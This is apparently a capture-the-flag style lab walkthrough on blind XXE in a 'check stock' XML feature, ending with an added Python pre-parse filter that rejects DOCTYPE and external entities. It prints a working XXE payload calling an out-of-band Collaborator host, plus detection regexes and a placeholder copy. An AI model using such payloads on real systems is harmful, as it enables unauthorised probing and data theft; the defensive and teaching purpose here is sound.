Blind XXE with out-of-band interaction

Exploitation
The lab has a "check stock" feature that parses XML input.

Send the stock-check request to Repeater.

This is a blind XXE: the response will not show the injected entity's value, so we need an out-of-band channel to confirm the injection.

Open Burp Collaborator, copy a Collaborator URL, and point an external entity at it so that the back end issues a DNS lookup to that URL; if the lookup arrives, the website is vulnerable to blind XXE.

This XXE attack causes the server to make a back-end HTTP request to the specified URL (the Collaborator URL). The attacker can monitor for the resulting DNS lookup and HTTP request, and thereby detect that the XXE attack was successful. The payload sent in Repeater:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://tgd18wllnshtjl7z3einaj853w9nxel3.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

The attack is successful: the back-end server issued a DNS lookup to the Collaborator server, so the website is vulnerable to blind XXE.
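From the defender's side, the fix for this lab's root cause is to never let a DTD reach the parser at all, since the stock-check format needs no DOCTYPE or entities. The following is an added example (not the lab's or PortSwigger's code) in Python: it classifies incoming XML, rejects anything carrying a DOCTYPE or a SYSTEM/PUBLIC entity before parsing, and only then parses the stockCheck document with the standard library; the Collaborator hostname and the sample requests are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Any DOCTYPE is rejected outright; the stockCheck schema never needs one.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# Specifically flags external (SYSTEM/PUBLIC) general or parameter entities,
# which are what the out-of-band payload on this page relies on.
EXTERNAL_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def _as_bytes(xml_input):
    return xml_input.encode("utf-8") if isinstance(xml_input, str) else xml_input


def classify(xml_input):
    """Return 'external-entity', 'doctype' or 'clean' for a raw XML request body."""
    data = _as_bytes(xml_input)
    if EXTERNAL_ENTITY_RE.search(data):
        return "external-entity"
    if DOCTYPE_RE.search(data):
        return "doctype"
    return "clean"


def is_rejected(xml_input):
    """True when the request must not be passed to the XML parser."""
    return classify(xml_input) != "clean"


def parse_stock_check(xml_input):
    """Parse a DTD-free stockCheck document; raise ValueError for anything else."""
    if is_rejected(xml_input):
        raise ValueError("rejected XML: " + classify(xml_input))
    root = ET.fromstring(_as_bytes(xml_input))
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element: " + root.tag)
    return {"productId": root.findtext("productId"), "storeId": root.findtext("storeId")}


# Constructed samples: the blind XXE payload shape from this page (placeholder host)
# and a legitimate stock-check request.
BLIND_XXE_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://COLLABORATOR-PLACEHOLDER.oastify.com"> ]>\n'
    "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
)
CLEAN_REQUEST = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
```

In production the same policy is usually enforced by a hardened parser (for example Python's defusedxml, or disabling DOCTYPE declarations in Java's DocumentBuilderFactory) rather than a regex pre-check alone; the pre-check here makes the rejection decision visible and loggable.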


Hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara